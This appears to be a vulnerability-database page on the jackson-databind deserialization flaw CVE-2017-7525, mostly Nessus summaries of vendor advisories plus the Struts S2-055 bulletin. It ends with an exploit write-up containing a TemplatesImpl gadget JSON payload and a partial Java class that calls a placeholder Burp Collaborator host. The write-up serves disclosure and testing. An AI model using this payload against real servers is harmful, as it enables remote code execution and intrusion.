undertow: Client can use bogus uri in Digest authentication (CVE-2017-12196) * jackson-databind: unsafe deserialization due to incomplete blacklist (incomplete fix for CVE-2017-7525 and CVE-2017-17485) (CVE-2018-5968) * ovirt-engine: account enumeration through login to web console (CVE-2018-1073) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Red Hat would like to thank Chris McCown for reporting CVE-2018-8088. The CVE-2017-12196 issue was discovered by Jan Stourac (Red Hat). Enhancement(s) : * Previously, the default memory allotment for the RHV-M Virtual Appliance was always large enough to include support for user additions. In this release, the RHV-M Virtual Appliance includes a swap partition that enables the memory to be increased when required. (BZ#1422982) * Previously, the partitioning scheme for the RHV-M Virtual Appliance included two primary partitions, last seen 2020-06-01 modified 2020-06-02 plugin id 109910 published 2018-05-18 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/109910 title RHEL 7 : Virtualization (RHSA-2018:1525) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2017-2635.NASL description An update is now available for Red Hat JBoss Enterprise Application Platform 6.4 for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server. This release of Red Hat JBoss Enterprise Application Platform 6.4.17 serves as a replacement for Red Hat JBoss Enterprise Application Platform 6.4.16, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Security Fix(es) : * It was found that when using remote logging with log4j socket server the log4j server would deserialize any log event received via TCP or UDP. An attacker could use this flaw to send a specially crafted log event that, during deserialization, would execute arbitrary code in the context of the logger application. (CVE-2017-5645) * A vulnerability was discovered in the error page mechanism in Tomcat last seen 2020-06-01 modified 2020-06-02 plugin id 103041 published 2017-09-08 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/103041 title RHEL 6 : JBoss EAP (RHSA-2017:2635) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2018-2089.NASL description An update is now available for Red Hat JBoss Enterprise Application Platform 7.1 for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server. This release of Red Hat JBoss Enterprise Application Platform 7.1.3 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.1.2, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Security Fix(es) : * jackson-databind: incomplete fix for CVE-2017-7525 permits unsafe serialization via c3p0 libraries (CVE-2018-7489) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. last seen 2020-06-01 modified 2020-06-02 plugin id 110797 published 2018-06-29 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/110797 title RHEL 7 : JBoss EAP (RHSA-2018:2089) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2017-3455.NASL description An update is now available for Red Hat JBoss Enterprise Application Platform 7.1 for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server. This release of Red Hat JBoss Enterprise Application Platform 7.1.0 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.0.0, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Security Fix(es) : * A Denial of Service can be caused when a long request is sent to EAP 7. (CVE-2016-7046) * The jboss init script unsafe file handling resulting in local privilege escalation. (CVE-2016-8656) * A deserialization vulnerability via readValue method of ObjectMapper which allows arbitrary code execution. (CVE-2017-7525) * JMSObjectMessage deserializes potentially malicious objects allowing Remote Code Execution. (CVE-2016-4978) * Undertow is vulnerable to the injection of arbitrary HTTP headers, and also response splitting. (CVE-2016-4993) * The domain controller will not propagate its administrative RBAC configuration to some slaves leading to escalate their privileges. (CVE-2016-5406) * Internal IP address disclosed on redirect when request header Host field is not set. (CVE-2016-6311) * Potential EAP resource starvation DOS attack via GET requests for server log files. (CVE-2016-8627) * Inefficient Header Cache could cause denial of service. (CVE-2016-9589) * The log file viewer allows arbitrary file read to authenticated user via path traversal. (CVE-2017-2595) * HTTP Request smuggling vulnerability due to permitting invalid characters in HTTP requests. (CVE-2017-2666) * Websocket non clean close can cause IO thread to get stuck in a loop. (CVE-2017-2670) * Privilege escalation with security manager last seen 2020-06-01 modified 2020-06-02 plugin id 105269 published 2017-12-15 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/105269 title RHEL 7 : JBoss EAP (RHSA-2017:3455) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2017-3141.NASL description An update for rhvm-appliance is now available for RHEV 4.X RHEV-H and Agents for RHEL-7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The RHV-M Virtual Appliance automates the process of installing and configuring the Red Hat Virtualization Manager. The appliance is available to download as an OVA file from the Customer Portal. The following packages have been upgraded to a later upstream version: rhvm-appliance (20171019.0). (BZ#1496586) Security Fix(es) : * A deserialization flaw was discovered in the jackson-databind which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper. (CVE-2017-7525) * A vulnerability was found in Jasypt that would allow an attacker to perform a timing attack on password hash comparison. (CVE-2014-9970) * It was found that when the security manager last seen 2020-06-01 modified 2020-06-02 plugin id 104493 published 2017-11-10 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/104493 title RHEL 7 : rhvm-appliance (RHSA-2017:3141) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2017-1835.NASL description An update is now available for Red Hat JBoss Enterprise Application Platform 7.0 for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server. This release of Red Hat JBoss Enterprise Application Platform 7.0.7 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.0.6, and includes bug fixes and enhancements, which are documented in the Release Notes linked to in the References. Security Fix(es) : * A deserialization flaw was discovered in jackson-databind which could allow an unauthenticated user to perform code execution by sending maliciously crafted input to the readValue method of the ObjectMapper. (CVE-2017-7525) * It was found that use of a JMS ObjectMessage does not safely handle user-supplied data when deserializing objects. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the JMS ObjectMessage. (CVE-2016-4978) Red Hat would like to thank Liao Xinxi (NSFOCUS) for reporting CVE-2017-7525. last seen 2020-06-01 modified 2020-06-02 plugin id 102140 published 2017-08-03 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102140 title RHEL 7 : JBoss EAP (RHSA-2017:1835) NASL family Debian Local Security Checks NASL id DEBIAN_DSA-4004.NASL description Liao Xinxi discovered that jackson-databind, a Java library used to parse JSON and other data formats, did not properly validate user input before attemtping deserialization. This allowed an attacker to perform code execution by providing maliciously crafted input. last seen 2020-06-01 modified 2020-06-02 plugin id 104057 published 2017-10-23 reporter This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/104057 title Debian DSA-4004-1 : jackson-databind - security update NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2017-2637.NASL description An update is now available for Red Hat JBoss Enterprise Application Platform 6.4 for Red Hat Enterprise Linux 5. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server. This release of Red Hat JBoss Enterprise Application Platform 6.4.17 serves as a replacement for Red Hat JBoss Enterprise Application Platform 6.4.16, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Security Fix(es) : * It was found that when using remote logging with log4j socket server the log4j server would deserialize any log event received via TCP or UDP. An attacker could use this flaw to send a specially crafted log event that, during deserialization, would execute arbitrary code in the context of the logger application. (CVE-2017-5645) * A vulnerability was discovered in the error page mechanism in Tomcat last seen 2020-06-01 modified 2020-06-02 plugin id 103043 published 2017-09-08 reporter This script is Copyright (C) 2017-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/103043 title RHEL 5 : JBoss EAP (RHSA-2017:2637) NASL family Debian Local Security Checks NASL id DEBIAN_DSA-4190.NASL description It was discovered that jackson-databind, a Java library used to parse JSON and other data formats, improperly validated user input prior to deserializing because of an incomplete fix for CVE-2017-7525. last seen 2020-06-01 modified 2020-06-02 plugin id 109557 published 2018-05-04 reporter This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/109557 title Debian DSA-4190-1 : jackson-databind - security update NASL family Debian Local Security Checks NASL id DEBIAN_DLA-2091.NASL description Several vulnerabilities were fixed in libjackson-json-java. CVE-2017-7525 Jackson Deserializer security vulnerability. CVE-2017-15095 Block more JDK types from polymorphic deserialization. CVE-2019-10172 XML external entity vulnerabilities. For Debian 8 last seen 2020-06-01 modified 2020-06-02 plugin id 133411 published 2020-02-03 reporter This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/133411 title Debian DLA-2091-1 : libjackson-json-java security update NASL family Fedora Local Security Checks NASL id FEDORA_2017-F452765E1E.NASL description Security fix for CVE-2017-7525 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2017-08-14 plugin id 102464 published 2017-08-14 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102464 title Fedora 25 : jackson-databind (2017-f452765e1e) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2018-2090.NASL description An update is now available for Red Hat JBoss Enterprise Application Platform 7.1 for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server. This release of Red Hat JBoss Enterprise Application Platform 7.1.3 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.1.2, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Security Fix(es) : * jackson-databind: incomplete fix for CVE-2017-7525 permits unsafe serialization via c3p0 libraries (CVE-2018-7489) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. last seen 2020-06-01 modified 2020-06-02 plugin id 110798 published 2018-06-29 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/110798 title RHEL 6 : JBoss EAP (RHSA-2018:2090) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2017-1834.NASL description An update is now available for Red Hat JBoss Enterprise Application Platform 7.0 for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server. This release of Red Hat JBoss Enterprise Application Platform 7.0.7 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.0.6, and includes bug fixes and enhancements, which are documented in the Release Notes linked to in the References. Security Fix(es) : * A deserialization flaw was discovered in jackson-databind which could allow an unauthenticated user to perform code execution by sending maliciously crafted input to the readValue method of the ObjectMapper. (CVE-2017-7525) * It was found that use of a JMS ObjectMessage does not safely handle user-supplied data when deserializing objects. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the JMS ObjectMessage. (CVE-2016-4978) Red Hat would like to thank Liao Xinxi (NSFOCUS) for reporting CVE-2017-7525. last seen 2020-06-01 modified 2020-06-02 plugin id 102139 published 2017-08-03 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102139 title RHEL 6 : JBoss EAP (RHSA-2017:1834) NASL family Debian Local Security Checks NASL id DEBIAN_DSA-4037.NASL description It was discovered that jackson-databind, a Java library used to parse JSON and other data formats, improperly validated user input prior to deserializing: following DSA-4004-1 for CVE-2017-7525, an additional set of classes was identified as unsafe for deserialization. last seen 2020-06-01 modified 2020-06-02 plugin id 104643 published 2017-11-17 reporter This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/104643 title Debian DSA-4037-1 : jackson-databind - security update NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2017-2638.NASL description An update for jboss-ec2-eap is now available for Red Hat JBoss Enterprise Application Platform 6.4 for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The jboss-ec2-eap packages provide scripts for Red Hat JBoss Enterprise Application Platform running on the Amazon Web Services (AWS) Elastic Compute Cloud (EC2). With this update, the jboss-ec2-eap package has been updated to ensure compatibility with Red Hat JBoss Enterprise Application Platform 6.4.17. Security Fix(es) : * It was found that when using remote logging with log4j socket server the log4j server would deserialize any log event received via TCP or UDP. An attacker could use this flaw to send a specially crafted log event that, during deserialization, would execute arbitrary code in the context of the logger application. (CVE-2017-5645) * A vulnerability was discovered in the error page mechanism in Tomcat last seen 2020-05-09 modified 2017-09-08 plugin id 103044 published 2017-09-08 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/103044 title RHEL 6 : jboss-ec2-eap (RHSA-2017:2638) NASL family Fedora Local Security Checks NASL id FEDORA_2017-8DF9EFED5F.NASL description Security fix for CVE-2017-7525 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2017-08-11 plugin id 102395 published 2017-08-11 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102395 title Fedora 24 : jackson-databind (2017-8df9efed5f) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2017-3189.NASL description An update for rh-eclipse47-jackson-databind is now available for Red Hat Developer Tools. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The jackson-databind package provides general data-binding functionality for Jackson, which works on top of Jackson core streaming API. Security Fix(es) : * A deserialization flaw was discovered in the jackson-databind which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper. This issue extends the previous flaw CVE-2017-7525 by blacklisting more classes that could be used maliciously. (CVE-2017-15095) Red Hat would like to thank Liao Xinxi (NSFOCUS) for reporting this issue. last seen 2020-06-01 modified 2020-06-02 plugin id 104538 published 2017-11-14 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/104538 title RHEL 7 : rh-eclipse47-jackson-databind (RHSA-2017:3189) NASL family CGI abuses NASL id ORACLE_PRIMAVERA_UNIFIER_CPU_APR_2018.NASL description According to its self-reported version number, the Oracle Primavera Unifier installation running on the remote web server is 16.x prior to 16.2.12.3 or 17.x prior to 17.12.3.0. It is, therefore, affected by multiple vulnerabilities. Note that Nessus has not tested for these issues but has instead relied only on the application last seen 2020-06-01 modified 2020-06-02 plugin id 109164 published 2018-04-19 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/109164 title Oracle Primavera Unifier Multiple Vulnerabilities (April 2018 CPU) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2017-2636.NASL description An update is now available for Red Hat JBoss Enterprise Application Platform 6.4 for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server. This release of Red Hat JBoss Enterprise Application Platform 6.4.17 serves as a replacement for Red Hat JBoss Enterprise Application Platform 6.4.16, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Security Fix(es) : * It was found that when using remote logging with log4j socket server the log4j server would deserialize any log event received via TCP or UDP. An attacker could use this flaw to send a specially crafted log event that, during deserialization, would execute arbitrary code in the context of the logger application. (CVE-2017-5645) * A vulnerability was discovered in the error page mechanism in Tomcat last seen 2020-06-01 modified 2020-06-02 plugin id 103042 published 2017-09-08 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/103042 title RHEL 7 : JBoss EAP (RHSA-2017:2636) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2018-0479.NASL description An update is now available for Red Hat JBoss Enterprise Application Platform 7.1 for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server. This release of Red Hat JBoss Enterprise Application Platform 7.1.1 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.1.0, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Security Fix(es) : * artemis/hornetq: memory exhaustion via UDP and JGroups discovery (CVE-2017-12174) * infinispan: Unsafe deserialization of malicious object injected into data cache (CVE-2017-15089) * jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-7525) (CVE-2017-15095) * jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-15095) (CVE-2017-17485) * resteasy: Vary header not added by CORS filter leading to cache poisoning (CVE-2017-7561) * undertow: Client can use bogus uri in Digest authentication (CVE-2017-12196) * undertow: ALLOW_ENCODED_SLASH option not taken into account in the AjpRequestParser (CVE-2018-1048) * jackson-databind: unsafe deserialization due to incomplete blacklist (incomplete fix for CVE-2017-7525 and CVE-2017-17485) (CVE-2018-5968) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. last seen 2020-06-01 modified 2020-06-02 plugin id 108323 published 2018-03-14 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/108323 title RHEL 6 : JBoss EAP (RHSA-2018:0479) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2017-3454.NASL description An update is now available for Red Hat JBoss Enterprise Application Platform 7.1 for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server. This release of Red Hat JBoss Enterprise Application Platform 7.1.0 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.0.0, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Security Fix(es) : * A Denial of Service can be caused when a long request is sent to EAP 7. (CVE-2016-7046) * The jboss init script unsafe file handling resulting in local privilege escalation. (CVE-2016-8656) * A deserialization vulnerability via readValue method of ObjectMapper which allows arbitrary code execution. (CVE-2017-7525) * JMSObjectMessage deserializes potentially malicious objects allowing Remote Code Execution. (CVE-2016-4978) * Undertow is vulnerable to the injection of arbitrary HTTP headers, and also response splitting. (CVE-2016-4993) * The domain controller will not propagate its administrative RBAC configuration to some slaves leading to escalate their privileges. (CVE-2016-5406) * Internal IP address disclosed on redirect when request header Host field is not set. (CVE-2016-6311) * Potential EAP resource starvation DOS attack via GET requests for server log files. (CVE-2016-8627) * Inefficient Header Cache could cause denial of service. (CVE-2016-9589) * The log file viewer allows arbitrary file read to authenticated user via path traversal. (CVE-2017-2595) * HTTP Request smuggling vulnerability due to permitting invalid characters in HTTP requests. (CVE-2017-2666) * Websocket non clean close can cause IO thread to get stuck in a loop. (CVE-2017-2670) * Privilege escalation with security manager last seen 2020-06-01 modified 2020-06-02 plugin id 105268 published 2017-12-15 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/105268 title RHEL 6 : JBoss EAP (RHSA-2017:3454) NASL family Misc. NASL id STRUTS_2_5_14_1.NASL description The version of Apache Struts running on the remote host is 2.5.x prior to 2.5.14.1. It is, therefore, affected by an unspecified flaw that is triggered when parsing JSON. This allows a remote attacker to cause a denial of service. Note that Nessus has not tested for these issues but has instead relied only on the application last seen 2020-06-01 modified 2020-06-02 plugin id 105005 published 2017-12-04 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/105005 title Apache Struts 2.5.x < 2.5.14.1 Json-lib JSON Parsing Unspecified DoS (S2-054) (S2-055) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2018-0481.NASL description An update for eap7-jboss-ec2-eap is now available for Red Hat JBoss Enterprise Application Platform 7.1.1 for Red Hat Enterprise Linux 6 and Red Hat JBoss Enterprise Application Platform 7.1.1 for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The eap7-jboss-ec2-eap packages provide scripts for Red Hat JBoss Enterprise Application Platform running on the Amazon Web Services (AWS) Elastic Compute Cloud (EC2). With this update, the eap7-jboss-ec2-eap package has been updated to ensure compatibility with Red Hat JBoss Enterprise Application Platform 7.1.1 Refer to the JBoss Enterprise Application Platform 7.1 Release Notes, linked to in the References section, for information on the most significant bug fixes and enhancements included in this release. Security Fix(es) : * artemis/hornetq: memory exhaustion via UDP and JGroups discovery (CVE-2017-12174) * infinispan: Unsafe deserialization of malicious object injected into data cache (CVE-2017-15089) * jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-7525) (CVE-2017-15095) * jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-15095) (CVE-2017-17485) * resteasy: Vary header not added by CORS filter leading to cache poisoning (CVE-2017-7561) * undertow: Client can use bogus uri in Digest authentication (CVE-2017-12196) * undertow: ALLOW_ENCODED_SLASH option not taken into account in the AjpRequestParser (CVE-2018-1048) * jackson-databind: unsafe deserialization due to incomplete blacklist (incomplete fix for CVE-2017-7525 and CVE-2017-17485) (CVE-2018-5968) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. last seen 2020-06-01 modified 2020-06-02 plugin id 108325 published 2018-03-14 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/108325 title RHEL 6 / 7 : JBoss EAP (RHSA-2018:0481) NASL family Fedora Local Security Checks NASL id FEDORA_2017-6A75C816FA.NASL description Security fix for CVE-2017-7525 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-05 modified 2017-08-14 plugin id 102456 published 2017-08-14 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102456 title Fedora 26 : jackson-databind (2017-6a75c816fa) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2017-1837.NASL description An update for eap7-jboss-ec2-eap is now available for Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 6 and Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. The eap7-jboss-ec2-eap packages provide scripts for Red Hat JBoss Enterprise Application Platform running on the Amazon Web Services (AWS) Elastic Compute Cloud (EC2). With this update, the eap7-jboss-ec2-eap package has been updated to ensure compatibility with Red Hat JBoss Enterprise Application Platform 7.0.7. Refer to the JBoss Enterprise Application Platform 7.0.7 Release Notes, linked to in the References section, for information on the most significant bug fixes and enhancements included in this release. Security Fix(es) : * A deserialization flaw was discovered in jackson-databind which could allow an unauthenticated user to perform code execution by sending maliciously crafted input to the readValue method of the ObjectMapper. (CVE-2017-7525) * It was found that use of a JMS ObjectMessage does not safely handle user-supplied data when deserializing objects. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the JMS ObjectMessage. (CVE-2016-4978) Red Hat would like to thank Liao Xinxi (NSFOCUS) for reporting CVE-2017-7525. last seen 2020-06-01 modified 2020-06-02 plugin id 102141 published 2017-08-03 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102141 title RHEL 6 / 7 : eap7-jboss-ec2-eap (RHSA-2017:1837)
Redhat
| advisories |
| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| rpms |
|
Seebug
bulletinFamily exploit description ### Summary Vulnerability in the Jackson JSON library | | | | :------------ | :------------ | | Who should read this | All Struts 2 developers and users which are using the REST plugin | | Impact of vulnerability | Not clear, please read the linked issue for more details. https://github.com/FasterXML/jackson-databind/issues/1599 | | Maximum security rating | Medium | | Recommendation | Upgrade to Struts 2.5.14.1 | | Affected Software | Struts 2.5 - Struts 2.5.14 | | Reporter | David Dillard < david dot dillard at veritas dot com> - Veritas Technologies Product Security Group | | CVE Identifier | CVE-2017-7525 | ### Problem A vulnerability was detected in the latest Jackson JSON library, which was reported here. Upgrade com.fasterxml.jackson to version 2.9.2 to address CVE-2017-7525. ### Solution Upgrade to Apache Struts version 2.5.14.1. Another solution is to manually upgrade Jackson dependencies in your project to not vulnerable versions, see this comment. ### Backward compatibility No backward incompatibility issues are expected. ### Workaround Upgrade Jackson JSON library to the latest version. id SSV:96913 last seen 2017-12-25 modified 2017-12-01 published 2017-12-01 reporter Root title Apache Struts2 S2-055(CVE-2017-7525) bulletinFamily exploit description Earlier this year, a vulnerability was discovered in the Jackson data-binding library, a library for Java that allows developers to easily serialize Java objects to JSON and vice versa, that allowed an attacker to exploit deserialization to achieve Remote Code Execution on the server. This vulnerability didn’t seem to get much attention, and even less documentation. Given that this is an easily exploited Remote Code Execution vulnerability with little documentation, I’m sharing my notes on it. ### What To Look For There are a couple of ways to use Jackson, the simplest, and likely most common, is to perform a binding to a single object, pulling the values from the JSON and setting the properties on the associated Java object. This is simple, straightforward, and likely not exploitable. Here’s a sample of what that type of document looks like: ``` { "name" : "Bob", "age" : 13, "other" : { "type" : "student" } } ``` What we are interested in, is a bit different – in some cases1 you are create arbitrary objects, and you will see their class name in the JSON document. If you see this, it should raise an immediate red flag. Here’s a sample of what these look like: ``` { "@class":"MyApp.Obj", val:[ "java.lang.Long", 1 ] } ``` To determine if this really is Jackson that you are seeing, one technique is (if detailed error messages are available) to provide invalid input and look for references to either of these: * com.fasterxml.jackson.databind * org.codehaus.jackson.map ### Building An Exploit The ability to create arbitrary objects though, does come with some limitations: the most important of which is that Jackson requires a default constructor (no arguments), so some things that seem like obvious choices (i.e. java.lang.ProcessBuilder) aren’t an option. There are some suggestions on techniques in the [paper from Moritz Bechler](https://github.com/mbechler/marshalsec), though the technique pushed in the paper is interesting (the focus is on loading remote objects from another server), it didn’t meet my needs. There are other, simple options available. Helpfully, the project gave us a starting point to build an effective exploit in one of their unit tests: ``` {'id': 124, 'obj':[ 'com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl', { 'transletBytecodes' : [ 'AAIAZQ==' ], 'transletName' : 'a.b', 'outputProperties' : { } } ] } ``` This code leverages a well-known ‘gadget’ to create an object that will accept a compile Java object (via transletBytecodes) and execute it as soon as outputProperties is accessed. This creates a very simple, straightforward technique to exploit this vulnerability. We can supply a payload to this to prove that we have execution, and we are done. ### Building The Payload In this case, the goal is to prove that we have execution, and the route I went is to have the server issue a GET request to Burp Collaborator. This can be done easily with the following sample code: ``` import java.io.*; import java.net.*; public class Exploit extends com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet { public Exploit() throws Exception { StringBuilder result = new StringBuilder(); URL url = new URL("http://[your-url].burpcollaborator.net"); HttpURLConnection conn = (HttpURLConnection) url.openConnection(); conn.setRequestMethod("GET"); BufferedReader rd = new BufferedReader(new InputStreamReader(conn.getInputStream())); String line; while ((line = rd.readLine()) != null) { result.append(line); } rd.close(); } @Override public void transform(com.sun.org.apache.xalan.internal.xsltc.DOM document, com.sun.org.apache.xml.internal.dtm.DTMAxisIterator iterator, 